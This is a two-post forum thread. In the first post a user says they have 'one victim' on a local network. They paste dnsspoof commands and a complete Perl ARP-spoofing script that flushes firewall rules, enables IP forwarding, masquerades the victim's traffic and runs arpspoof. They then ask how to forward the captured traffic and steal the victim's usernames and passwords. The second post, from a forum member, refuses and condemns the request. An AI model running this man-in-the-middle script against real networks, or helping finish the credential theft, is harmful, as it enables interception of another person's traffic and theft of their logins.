Results 1 to 2 of 2

Thread: capture and forwarding traffic from victim

  1. #1
    Just burned his ISO
    Join Date
    May 2007
    Posts
    1

    Default capture and forwarding traffic from victim

    Hello everyone, sorry for my bad English, but i am from Bulgaria.
    I have one victim. I write this in terminal of my linux:
    Code:
    dnsspoof -i eth0 
    perl sniff.pl  eth0 10.10.4.175 10.10.4.1
    And result of that commands is all traffic of victim go to me. I receive this traffic, but don't know how to forward to real destination and how to take usernames and passwords of oblation.
    Somebody can help me with something.

    Thanks in advance.

    P.S>sniff.pl file
    Code:
    #!/usr/bin/perl
    #
    # Static arp attack
    #
    # Require linux 2.4 (tested on Redhat 9.0)
    # Require dsniff 
    # Require iptables 
    # Modules
    use Socket;
    use IO::Socket;
    # Main
    $ARGC=@ARGV;
    $interface = @ARGV[0];
    $victim = @ARGV[1];
    $gate = @ARGV[2];
    print ("\n");
    print ("==================================================\n");
    print ("== Static arp attack ==\n");
    print ("== Discovered and Written By r00ty ==\n");
    print ("==================================================\n");
    print ("\n");
    if ($ARGC <3) {
    printf "\nUsage :\n";
    printf "perl hunter.pl <interface> <victim> <gateway>\n\n";
    }
    elsif ($ARGC==3){
    printf "Start iptables\n";
    system("/etc/init.d/iptables start");
    printf "Load iptables modules\n\n";
    system("insmod ip_tables");
    system("insmod iptable_filter");
    system("insmod ip_conntrack");
    system("insmod ip_conntrack_ftp");
    system("insmod ip_conntrack_irc");
    system("insmod iptable_nat");
    system("insmod ip_nat_ftp");
    system("insmod ip_nat_irc");
    system("insmod ipt_MASQUERADE");
    printf "Flush all the rules in the filter and nat tables\n\n";
    system("iptables -F");
    system("iptables -t nat -F");
    system("iptables -t mangle -F");
    printf "Erase all chains that's not default in filter and nat table\n\n";
    system("iptables -X");
    system("iptables -t nat -X");
    system("iptables -t mangle -X");
    printf "Zero counters\n\n";
    system("iptables -Z");
    printf "Set up a default ACCEPT policy for the builtin chains\n\n";
    system("iptables -P INPUT ACCEPT");
    system("iptables -P FORWARD ACCEPT");
    system("iptables -P OUTPUT ACCEPT");
    printf "Setup IP forwarding\n\n";
    system("echo 1 > /proc/sys/net/ipv4/ip_forward");
    printf "Masquerade\n\n";
    system("iptables -t nat -A POSTROUTING -o $interface -s $victim -j MASQUERADE");
    printf "ICMP redirects\n\n";
    system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP");
    printf "Start arpspoofing\n\n";
    system("arpspoof -i $interface -t $victim $gate");
    }

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by Abadon View Post
    I have one victim.

    And result of that commands is all traffic of victim go to me. I receive this traffic, but don't know how to forward to real destination and how to take usernames and passwords of oblation.
    Somebody can help me with something.
    Ill help you with something............

    Get lost....!!!!! Your kind is not welcome here. We don't condone illegal behavior like that. No one here will help you, and if they do, they'll probably be banned along with you. This is your ONLY warning. Read the FORUM GUIDELINES here---->>>>
    Code:
    http://forums.remote-exploit.org/showthread.php?t=5676
    Move this joker to the
    "idiots corner" and give him a "unique name please"
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •